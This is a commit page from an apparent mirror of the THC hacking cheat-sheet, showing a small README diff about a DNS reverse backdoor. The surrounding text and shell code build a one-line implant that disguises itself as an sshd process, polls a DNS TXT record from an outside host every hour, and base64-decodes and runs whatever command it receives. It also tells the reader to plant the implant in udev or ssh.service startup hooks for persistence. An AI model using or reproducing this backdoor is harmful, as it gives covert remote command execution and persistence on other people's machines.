github/thc-tips-tricks-hacks-cheat-sheet
1
1
Fork 0
mirror of https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet.git synced 2026-01-09 15:58:02 -05:00
Code Issues Packages Projects Releases Wiki Activity

Update README.md

Browse Source
This commit is contained in:
skyper
2025-05-06 14:15:43 +01:00
committed by GitHub
parent ed79114848
commit f5c1b74f7f
1 changed files with 3 additions and 2 deletions
Download Patch File Download Diff File Expand all files Collapse all files

5
README.md
View File

@@ -1873,9 +1873,9 @@ An elaborate DNS reverse backdoor (as a daemon and living-off-the-land):
- Depends on bash, dig and base64 only.
- Hides as `sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups`
- Requests a DNS TXT record every 60 minutes (from b00m2.team-teso.net).
- Base64-decodes the TXT record and executes the command on the target.
- Base64-decodes the TXT record and executes the command on the target. (the test command creates /tmp/.b00m).
1. Modify the following to your liking and then Cut & Paste it to generate the 1-line implant.
1. Modify the following to your liking and then Cut & Paste it to generate the 1-line implant.
```shell
base64 -w0 >x.txt <<-'EOF'
@@ -1892,6 +1892,7 @@ while :; do
done'|exec -a "$P" bash &) &>/dev/null
EOF
echo "===> Execute the following on the target:"$'\n\033[0;36m'"echo $(<x.txt)|base64 -d|bash"$'\033[0m'
rm -f x.txt
```
2. Add this 1-line implant to any startup script on the target (e.g. to [udev](https://www.aon.com/en/insights/cyber-labs/unveiling-sedexp) or `ExecStartPre=` in */usr/lib/systemd/system/ssh.service*). An clever example for ssh.service: